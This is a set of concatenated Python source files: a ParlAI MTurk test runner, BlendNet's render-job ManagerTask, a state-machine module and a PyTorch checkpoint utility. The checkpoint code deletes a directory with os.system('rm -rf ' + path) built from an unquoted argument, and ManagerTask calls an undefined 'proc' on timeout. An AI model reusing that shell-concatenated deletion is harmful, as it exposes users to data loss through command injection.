assign_id_1 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_1, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_2, assign_id_3)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents for the one worker
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_1, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(3, mturk_manager)
# Ensure no task has started yet
assert test_agent_2.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
check_status(assign_state_2.status, AssignState.STATUS_WAITING)
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Create third agent
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_2, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Start heartbeats for 3
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
in_agent = None
in_assign = None
out_agent = None
out_assign = None
if assign_state_1.status == AssignState.STATUS_IN_TASK:
in_agent = test_agent_1
in_assign = mturk_manager_assign_1
out_agent = test_agent_2
out_assign = mturk_manager_assign_2
elif assign_state_2.status == AssignState.STATUS_IN_TASK:
out_agent = test_agent_1
out_assign = mturk_manager_assign_1
in_agent = test_agent_2
in_assign = mturk_manager_assign_2
else:
assert False, 'Neither agent moved into the task world'
wait_for_state_time(4, mturk_manager)
assert in_agent.wants_to_send or test_agent_3.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
first_agent = None
second_agent = None
if in_agent.wants_to_send:
first_agent = in_agent
second_agent = test_agent_3
else:
first_agent = test_agent_3
second_agent = in_agent
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(in_assign.state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_3.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert in_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.hit_is_expired == True, \
'Expired HIT was not marked as such'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[UNIQUE_CONVERSATION_TEST] = True
# Map of tests to run to their testing function, slowest tests first reduces
# overall runtime
TESTS = {
DUO_NO_ONBOARDING_TEST: test_duo_no_onboarding,
SOLO_ONBOARDING_TEST: test_solo_with_onboarding,
DUO_ONBOARDING_TEST: test_duo_with_onboarding,
EXPIRE_HIT_TEST: test_expire_hit,
DUO_ONE_DISCONNECT_TEST: test_duo_one_disconnect,
DUO_VALID_RECONNECT_TEST: test_duo_valid_reconnects,
UNIQUE_CONVERSATION_TEST: test_unique_workers_in_conversation,
ALLOWED_CONVERSATION_TEST: test_allowed_conversations,
SOLO_REFRESH_TEST: test_solo_refresh_in_middle,
SOLO_NO_ONBOARDING_TEST: test_solo_no_onboarding,
COUNT_COMPLETE_TEST: test_count_complete,
SOCKET_TEST: test_socket_manager
}
# Runtime threads, MAX_THREADS is used on initial pass, RETEST_THREADS is used
# with flakey tests that failed under heavy load and thus may not have met
# the expected times for updating state
MAX_THREADS = 8
RETEST_THREADS = 2
def run_tests(tests_to_run, max_threads, base_opt, server_url):
global start_time
failed_tests = []
threads = {}
for test_name in tests_to_run:
while len(threads) >= max_threads:
new_threads = {}
for n in threads:
if threads[n].isAlive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
new_thread = threading.Thread(target=TESTS[test_name],
args=(base_opt.copy(), server_url))
new_thread.start()
start_times[test_name] = time.time()
threads[test_name] = new_thread
time.sleep(0.25)
while len(threads) > 0:
new_threads = {}
for n in threads:
if threads[n].isAlive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
return failed_tests
def main():
start_time = time.time()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
base_opt = argparser.parse_args()
base_opt['is_sandbox'] = True
base_opt['num_conversations'] = 1
base_opt['count_complete'] = False
task_name, server_url = handle_setup(base_opt)
print ("Setup time: {} seconds".format(time.time() - start_time))
start_time = time.time()
try:
failed_tests = run_tests(TESTS, MAX_THREADS, base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed: ", failed_tests)
print("Retrying flakey tests with fewer threads")
flakey_tests = {}
for test_name in failed_tests:
flakey_tests[test_name] = TESTS[test_name]
failed_tests = run_tests(flakey_tests, RETEST_THREADS, \
base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed even on retry: ", failed_tests)
test_duration = time.time() - start_time
print("Test duration: {} seconds".format(test_duration))
except:
raise
finally:
handle_shutdown(task_name)
if __name__ == '__main__':
main()
|
ManagerTask.py
|
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
'''BlendNet ManagerTask
Description: Task used by Manager to control jobs
'''
import os
import time
import threading
import subprocess
import statistics # Calculate good remaining time
from .TaskBase import TaskConfig, TaskState, TaskBase
class ManagerTaskConfig(TaskConfig):
def __init__(self, parent):
self._defs['agents_num'] = {
'description': '''How much agents to use from the pool''',
'type': int,
'validation': lambda cfg, val: val <= cfg._parent._parent._cfg.agents_max,
'min': 0,
'default': lambda cfg: cfg._parent._parent._cfg.agents_max,
}
self._defs['use_compositing_nodes'] = {
'description': '''Use compositing nodes from the project''',
'type': bool,
'default': True,
}
self._defs['compose_filepath'] = {
'description': '''Where to place the task compose result on the Addon side''',
'type': str,
'default': None,
}
super().__init__(parent)
class ManagerTask(TaskBase):
def __init__(self, manager, name, data = {}):
super().__init__(manager, name, ManagerTaskConfig(self), data)
with self._status_lock:
self._status.update({
'start_time_actual': self._status.get('start_time_actual'), # Time of the first agent task started
'samples_per_workload': self._status.get('samples_per_workload'), # How much samples manager give to one agent
'samples_acquired': self._status.get('samples_done', 0), # How much samples was taken to process by agents
'workloads_taken': self._status.get('workloads_taken', 0), # How much agent tasks was taken
'results_processing': self._status.get('results_processing'), # While results still processing task can't be completed
'compose_filepath': self._status.get('compose_filepath'), # Composed image filepath to store the image on the Addon
})
self._status['result']['compose'] = self._status['result'].get('compose', None) # Blob ID of the composed image
# Task executions by agents
self._executions = {}
# Info about the execution statuses used in the execution watcher
self._execution_status = data.get('execution_status', {})
# Task execution results and processor
self._results_preview_lock = threading.Lock()
self._results_preview = data.get('results_preview', {})
self._results_render_lock = threading.Lock()
self._results_render = data.get('results_render', {})
self._results_watcher = None
self._results_to_remove_lock = threading.Lock()
self._results_to_remove = set()
self._stop_task = False # Used to stop the task
print('DEBUG: Created Manager task', name)
def snapshot(self):
'''Returns dict with all the data about task to restore it later'''
out = super().snapshot()
out.update({
'execution_status': self._execution_status.copy(),
'results_preview': self._results_preview.copy(),
'results_render': self._results_render.copy(),
})
return out
def statusResultsProcessingSet(self, val):
with self._status_lock:
self._status['results_processing'] = val
def _resultsWatcher(self):
'''Merges multiple results from a number of agents into one result'''
print('DEBUG: Starting ManagerTask "%s" results watcher' % self.name())
prev_preview = set()
while True:
to_merge = None
to_compose = None
# Preview merge in priority, it's merged often to provide quick updates for Addon
with self._results_preview_lock:
blobs = set(self._results_preview.values())
if blobs != prev_preview:
to_merge = (self.statusPreviewSet, blobs)
prev_preview = blobs.copy()
# Next check to merge render results, executed once when all the samples are ready
if not to_merge:
to_render = False
if (not self._status['result']['render']
and self.isRenderComplete()
and not self._stop_task):
to_render = True
if to_render:
with self._results_render_lock:
to_merge = (self.statusRenderSet, set(self._results_render.values()))
print('INFO: Merging %s render results for task "%s"' % (len(to_merge[1]), self.name()))
print('DEBUG: Blobs to merge:', to_merge[1])
# Lastly check if it's time for compositing, executed once when render is completed
if not to_merge:
with self._status_lock:
if (not self._status['result']['compose']
and self._status['result']['render']
and not self._stop_task):
to_compose = True
if not to_merge:
if not to_compose:
self.statusResultsProcessingSet(False)
if not self.isRunning():
self.statusResultsProcessingSet(False)
break # If all the requests was processed and task is not running - stop
if not to_compose:
time.sleep(1.0)
continue
self.statusResultsProcessingSet(True)
if to_merge:
self._mergeWorker(to_merge)
elif to_compose:
self._composeWorker()
self._results_watcher = None
print('DEBUG: Stopped ManagerTask "%s" results watcher' % self.name())
def _mergeWorker(self, to_merge):
'''Merge the multiple preview or render images to one'''
print('DEBUG: Merge started for task "%s"' % (self.name(),))
try:
if len(to_merge[1]) == 1:
# Sending directly to results just one image to merge
to_merge[0](to_merge[1].pop())
else:
files = dict([ (blob + '.exr', blob) for blob in to_merge[1] ])
cfg = {
'images': [ 'project/' + f for f in files.keys() ],
'result': 'result.exr',
}
with self.prepareWorkspace(files) as ws_path:
process = self.runBlenderScriptProcessor(ws_path, 'merge', cfg)
self._processOutputs(process, show_out=(to_merge[0] == self.statusRenderSet))
blob = self._parent._fc.blobStoreFile(os.path.join(ws_path, cfg['result']), True)
if not blob:
print('ERROR: Unable to store blob for merge result of "%s"' % self.name())
return
print('DEBUG: Merge result:', blob['id'], blob['size'])
to_merge[0](blob['id'])
except Exception as e:
print('ERROR: Exception occurred during merging the results for task "%s": %s: %s' % (self.name(), type(e), e))
# Critical only on render merge
if to_merge[0] == self.statusRenderSet:
self.stateError({self.name(): 'Exception occurred during merging the results: %s' % (e,)})
print('DEBUG: Merge completed for task "%s"' % (self.name(),))
# Clean the old result blobs
with self._results_to_remove_lock:
if not self._results_to_remove:
return
print('DEBUG: Running cleaning of %s result blobs' % len(self._results_to_remove))
for blob_id in self._results_to_remove.copy():
if self._parent._fc.blobRemove(blob_id):
self._results_to_remove.remove(blob_id)
print('DEBUG: Merge clean completed for task "%s"' % (self.name(),))
def _composeWorker(self):
'''Running blender instance to compose and export the rendered image'''
print('DEBUG: Starting composite process for task "%s"' % (self.name(),))
try:
with self._status_lock:
# Composition can use dependencies - so getting them all to the workspace
files_map = self.filesGet()
# And updating deps with the rendered image to replace the renderl layer node
render_name = 'blendnet-' + self._status['result']['render'][:6]
files_map.update({
render_name + '.exr': self._status['result']['render'],
})
cfg = {
'use_compositing_nodes': self._cfg.use_compositing_nodes,
'frame': self._cfg.frame,
'render_file_path': 'project/' + render_name + '.exr',
'result_dir': render_name + '-result',
'project_path': self._cfg.project_path,
'cwd_path': self._cfg.cwd_path,
}
print('DEBUG: Files to use in workspace:')
for path in sorted(files_map):
print('DEBUG: ', files_map[path], path)
with self.prepareWorkspace(files_map) as ws_path:
process = self.runBlenderScriptProcessor(ws_path, 'compose', cfg, blendfile=self._cfg.project)
self._processOutputs(process, show_out=True)
# Checking the result_dir and set the compose if the result file is here
for filename in os.listdir(os.path.join(ws_path, cfg['result_dir'])):
blob = self._parent._fc.blobStoreFile(os.path.join(ws_path, cfg['result_dir'], filename), True)
if not blob:
print('ERROR: Unable to store blob for compose result of', self.name())
return
self.statusComposeSet(blob['id'])
break
if not self._status['result']['compose']:
self.stateError({self.name(): 'Result file of the compose operation not found'})
except Exception as e:
print('ERROR: Exception occurred during composing the result for task "%s": %s: %s' % (self.name(), type(e), e))
self.stateError({self.name(): 'Exception occurred during composing the result: %s' % (e,)})
print('DEBUG: Compositing completed for task', self.name())
def _processOutputs(self, process, show_out = False):
'''Shows info from the process'''
outb = b''
errb = b''
outs = ''
errs = ''
try:
outb, errb = process.communicate(timeout=360)
except subprocess.TimeoutExpired:
proc.kill()
outb, errb = proc.communicate()
raise
finally:
if process.poll() == -9: # OOM kill
self.stateError({self.name(): 'The process was killed by Out Of Memory - try to use bigger VM for the Manager'})
# On windows it's hard to predict what kind of encoding will be used
try:
try:
outs = outb.decode('utf-8')
errs = errb.decode('utf-8')
except (LookupError, UnicodeDecodeError):
# UTF-8 not worked, so probably it's latin1
outs = outb.decode('iso-8859-1')
errs = errb.decode('iso-8859-1')
if process.returncode != 0 or errs or show_out:
print('INFO: Process stdout:')
for line in outs.split('\n'):
print(' ' + line)
if process.returncode != 0 or errs:
print('WARN: The process seems not ended well...')
print('WARN: Process stderr:')
for line in errs.split('\n'):
print(' ' + line)
except (LookupError, UnicodeDecodeError) as e:
print('ERROR: Unable to decode the blender stdout/stderr data:', type(e), e)
return outs
def isRenderComplete(self):
'''Checks that all the tasks was completed and results were downloaded'''
# The only tasks contains render results - is completed or stopped
task_end_states = {TaskState.COMPLETED.name, TaskState.STOPPED.name}
# Stopped tasks could contain no rendered samples
good_tasks = [ task for task in self._execution_status.values()
if task.get('state') in task_end_states
and task.get('samples_done') > 0
]
tasks_set = set([ task.get('name') for task in good_tasks ])
tasks_samples = sum([ task.get('samples_done') for task in good_tasks ])
# Making sure all the samples-containing tasks is in render results
# and the completed samples is more or equal the required samples
return (tasks_set and tasks_set == set(self._results_render.keys())
and tasks_samples >= self._cfg.samples)
def calculateWorkloadSamples(self, samples, agents):
'''Calculating optimal number of samples per agent'''
from math import ceil, floor
out = min(ceil(samples/agents), 100)
batches = floor(samples/(out*agents))
if batches > 0:
out += ceil(samples%(out*agents)/(batches*agents))
return ceil(out/2) if out > 140 else out
def acquireWorkload(self, agent):
'''Returns map with parameters for agent to process'''
with self._status_lock:
if self._stop_task or not self.isRunning():
return {} # Stopping in progress - no more workloads
left_to_acquire = self._cfg.samples - self._status['samples_acquired']
# "<=" just in case when more samples was calculated to prevent endless task
if left_to_acquire <= 0:
return {} # No work is available
if not self._status['samples_per_workload']:
self._status['samples_per_workload'] = self.calculateWorkloadSamples(self._cfg.samples, self._cfg.agents_num)
workload = self.configsGet()
# TODO: Dynamically change min samples according to the
# time to render and loading/rendering ratio
workload['samples'] = min(left_to_acquire, self._status['samples_per_workload'])
self._status['samples_acquired'] += workload['samples']
# Append to seed to make agent render unique
workload['seed'] += self._status['workloads_taken']
workload['task_name'] = '%s_%d' % (self.name(), self._status['workloads_taken'])
# Put agent task into executions list
with self._execution_lock:
self._executions[workload['task_name']] = agent
self._status['workloads_taken'] += 1
return workload
def returnAcquiredWorkload(self, samples):
'''If agent was not able to complete the task - it could return samples back'''
with self._status_lock:
self._status['samples_acquired'] -= samples
def updatePreview(self, agent_task, blob_id):
'''Run process of merging the available previews and update the task results'''
print('DEBUG: Updating preview for task "%s" blob id "%s"' % (agent_task, blob_id))
old_blob_id = None
with self._results_preview_lock:
old_blob_id = self._results_preview.get(agent_task)
if blob_id is None:
if agent_task in self._results_preview:
self._results_preview.pop(agent_task)
else:
self._results_preview[agent_task] = blob_id
if old_blob_id:
with self._results_to_remove_lock:
self._results_to_remove.add(old_blob_id)
def updateRender(self, agent_task, blob_id):
'''Run process of merging the available renders and update the task results'''
print('DEBUG: Updating render for task "%s" blob id "%s"' % (agent_task, blob_id))
old_blob_id = None
with self._results_render_lock:
old_blob_id = self._results_render.get(agent_task)
if blob_id is None:
if agent_task in self._results_render:
self._results_render.pop(agent_task)
else:
self._results_render[agent_task] = blob_id
if old_blob_id:
with self._results_to_remove_lock:
self._results_to_remove.add(old_blob_id)
def _executionWatcher(self):
'''Looking for the task execution on the agents, collecting renders together'''
print('DEBUG: Execution watcher of task "%s" is started' % self.name())
# Will help us to combine results
if not self._results_watcher:
self._results_watcher = threading.Thread(target=self._resultsWatcher)
self._results_watcher.start()
task_end_states = {TaskState.STOPPED.name, TaskState.COMPLETED.name, TaskState.ERROR.name}
update_messages_time = 0
while self.isRunning():
if self._parent.isTerminating():
self.stop()
with self._execution_lock:
executions = self._executions.copy()
for task_name, agent in executions.items():
prev_status = self._execution_status.get(task_name, {})
task_status = prev_status.copy()
if prev_status.get('state') in task_end_states:
continue
if agent.isActive():
requested_time = time.time()
task_status = agent.taskStatus(task_name)
if not task_status:
continue
task_status['_requested_time'] = requested_time # Will help with remaining calculations
else:
# If it was not active before - just wait
if not prev_status:
continue
# If it was active - looks like the agent failed and we have to mark task as stopped
print('WARN: The agent become not active - invalidating its task')
agent.taskStop(task_name) # Try to stop the task on the agent anyway
task_status['state'] = TaskState.STOPPED.name
if self._stop_task and task_status.get('state') not in task_end_states:
print('DEBUG: stopping Agent task %s' % task_name)
agent.taskStop(task_name)
# Update task messages once per 10 sec
if update_messages_time + 10 < time.time():
self.executionMessagesSet(agent.taskMessages(task_name).get(task_name), task_name)
param = 'preview'
if prev_status.get('result', {}).get(param) != task_status.get('result', {}).get(param):
print('DEBUG: task %s %s changed: %s' % (task_name, param, task_status.get('result', {}).get(param)))
agent.requestPreviewDownload(task_name, self.updatePreview)
param = 'render'
if prev_status.get('result', {}).get(param) != task_status.get('result', {}).get(param):
print('DEBUG: task %s %s changed: %s' % (task_name, param, task_status.get('result', {}).get(param)))
agent.requestRenderDownload(task_name, self.updateRender)
param = 'state'
if prev_status.get(param) != task_status.get(param):
print('DEBUG: task %s %s changed: %s' % (task_name, param, task_status.get(param)))
if task_status.get('state') == TaskState.RUNNING.name:
with self._status_lock:
# Set the actual start time when the first agent task reported about it
if not self._status['start_time_actual']:
self._status['start_time_actual'] = task_status.get('start_time')
if task_status.get('state') in task_end_states:
print('DEBUG: Retreive details about the task %s execution' % task_name)
self.executionDetailsSet(agent.taskDetails(task_name).get(task_name), task_name)
self.executionMessagesSet(agent.taskMessages(task_name).get(task_name), task_name)
agent.workEnded()
if task_status.get('state') == TaskState.STOPPED.name:
print('WARN: The agent task %s was stopped' % task_name)
return_samples = task_status.get('samples', agent.work().get('samples'))
# Main task output is render - so if it's exists, we can think that some work was done
if task_status.get('result', {}).get('render'):
# If agent was able to complete some work - return the rest back to task
if task_status.get('samples_done'):
return_samples -= task_status['samples_done']
else:
# Due to the issue BlendNet#57 it's the only way for the stopped agent task
# Making sure user will not see more samples than actually rendered
task_status['samples_done'] = 0
# Cleaning results of failed task
self.updatePreview(task_name, None)
self.updateRender(task_name, None)
if return_samples > 0:
print('DEBUG: Agent %s returning samples to render: %s' % (agent._name, return_samples))
self.returnAcquiredWorkload(return_samples)
if task_status.get('state') == TaskState.COMPLETED.name:
print('INFO: The agent task %s was completed' % task_name)
if task_status.get('state') == TaskState.ERROR.name:
print('ERROR: The agent task %s was ended with status "ERROR"' % task_name)
self._execution_status[task_name] = task_status
if update_messages_time + 10 < time.time():
update_messages_time = time.time()
# Updating the task left samples
self.statusSamplesDoneSet(sum([ t.get('samples_done') for t in self._execution_status.values() ]))
# Calculate the task remaining time
time_per_sample = []
for task, status in self._execution_status.items():
if not (status.get('start_time') and status.get('samples')):
continue
if status.get('end_time'):
# Simple calculation based on start and end time
time_per_sample.append((status['end_time'] - status['start_time']) / status['samples'])
elif status.get('remaining') and status.get('samples_done'):
# Calculating time per sample based on task remaining time and left samples to render
prelim_render_time = status['_requested_time'] + status['remaining'] - status['start_time']
time_per_sample.append(prelim_render_time / status['samples'])
if time_per_sample:
remaining = statistics.median(time_per_sample) * (self._cfg.samples - self._status['samples_done'])
self.statusRemainingSet(int(remaining))
# Check if all the samples was processed and tasks completed
if self._status['results_processing']:
# If the results are processing - let's do nothing
pass
elif any([ task.get('state') == TaskState.ERROR.name for task in self._execution_status.values() ]):
for name, task in self._execution_status.items():
if not task.get('state_error_info'):
continue
print('ERROR: Agent task "%s" ended up in ERROR state' % name)
self.stateError({name: task.get('state_error_info')})
elif all([ task.get('state') in task_end_states for task in self._execution_status.values() ]):
if self._stop_task:
print('INFO: Task %s is stopped' % self.name())
self.stateStop()
self._stop_task = False
continue
if self._status['result']['compose']:
print('INFO: Task %s is completed' % (self.name(),))
self.stateComplete()
continue
time.sleep(1.0)
with self._state_lock:
print('DEBUG: Execution watcher of task "%s" is ended with state %s' % (self.name(), self._state.name))
with self._execution_lock:
self._execution_watcher = None
def status(self):
'''Returns the manager task status information'''
out = super().status()
out.update({
'compose_filepath': self._cfg.compose_filepath,
})
return out
def statusComposeSet(self, blob_id):
with self._status_lock:
self._status['result']['compose'] = blob_id
def _stop(self):
self._stop_task = True
def stateSet(self, state):
super().stateSet(state)
self._parent.tasksSave([self])
|
__init__.py
|
from collections import defaultdict
import inspect
import time
import threading
class TransitionWithoutOverloadException(Exception):
pass
nop = lambda *a, **kw: None
class Transition:
def __init__(self, next=None, check=None, watch=[]):
if next is not None:
self.next = next
self.watch = watch
if check is not None:
self.check = check
def getNextState(self, *args):
return self.next
def watchParameters(self):
return self.watch
def check(self, *args):
return True
def onTrigger(self, *args, **kwargs):
pass
class Timeout(Transition):
def __init__(self, next, seconds):
Transition.__init__(self, next=next, watch=["time_in_state"])
self.seconds = seconds
def check(self, time_in_state):
return time_in_state > self.seconds
def addTransition(state=None, next=None, watch=None):
def decorator(fn):
w = watch
if w is None:
if fn.check != Transition.check:
w = inspect.getargspec(fn.check).args[1:]
elif fn.getNextState != Transition.getNextState:
w = inspect.getargspec(fn.getNextState).args[1:]
elif fn.onTrigger != Transition.onTrigger:
w = inspect.getargspec(fn.onTrigger).args[1:]
elif fn.watchParameters == Transition.watchParameters:
raise TransitionWithoutOverloadException("""Transition has not overloaded any of the following methods:
check, getNextState, onTrigger, watchParameters""")
if fn.watchParameters == Transition.watchParameters:
t = fn(next=next, watch=w)
else:
t = fn(next=next)
if state is not None:
state.addTransition(t)
return fn
return decorator
class State:
def __init__(self, name="", parent=None, onEnter=nop, onExit=nop):
self.name = name
self.parent = parent
self.transitions = []
self.watch = defaultdict(list)
self._onEnter = onEnter
self._onExit = onExit
def addTransition(self, t):
self.transitions.append(t)
wparams = t.watchParameters()
if len(wparams)>0:
for w in wparams:
self.watch[w].append(t)
else:
self.watch["__any__"].append(t)
def onEnter(self):
self._onEnter()
def onExit(self):
self._onExit()
def __str__(self):
return self.name
def __repr__(self):
return self.name
class StateMachine:
def __init__(self, root, time_resolution=0.1):
self.current_state = list()
self.current_state_set = set()
self.values = dict()
self.known_params = set()
self.just_transitioned = True
self.watch_params = defaultdict(list)
self.transitions = []
self.changeState(root)
self._stop_event = threading.Event()
def selfheartbeat(sm):
while not self._stop_event.is_set():
sm.heartbeat()
time.sleep(time_resolution)
self.heartbeat_thread = threading.Thread(target=selfheartbeat, args=(self,))
self.heartbeat_thread.setDaemon(True)
self.heartbeat_thread.start()
def __del__(self):
self._stop_event.set()
def changeState(self, s):
newState = list()
newStateSet = set()
while s is not None:
if s not in newStateSet:
newState.append(s)
newStateSet.add(s)
s = s.parent
if self.current_state != set():
if self.current_state != newState:
for s in (self.current_state_set - newStateSet):
s.onExit()
for s in (newStateSet - self.current_state_set):
s.onEnter()
self.current_state = newState
self.current_state_set = newStateSet
self.state_time_entered = time.time()
self.heartbeat(quiet=True)
self.onChangeState(newState)
self.watch_params = defaultdict(list)
self.transitions = []
for s in self.current_state:
for (param, transitions) in s.watch.items():
self.watch_params[param].extend(transitions)
self.transitions.extend(transitions)
def heartbeat(self, quiet=False):
if quiet:
self.values["time_in_state"] = time.time() - self.state_time_entered
else:
self.update("time_in_state", time.time() - self.state_time_entered)
def update(self, param, value):
if isinstance(value, (bool,)):
if param in self.values and value == self.values[param]:
return
self.values[param] = value
self.known_params.add(param)
if self.just_transitioned:
transitions = self.transitions
else:
transitions = self.watch_params[param] + self.watch_params["__any__"]
for t in transitions:
params = t.watchParameters()
if self.known_params.issuperset(params):
needed_params = [self.values[p] for p in params]
if t.check(*needed_params):
nextState = t.getNextState(*needed_params)
if nextState is not None:
t.onTrigger(*needed_params)
self.changeState(nextState)
self.just_transitioned = True
return
self.just_transitioned = False
def onChangeState(self, s):
pass
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import argparse
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
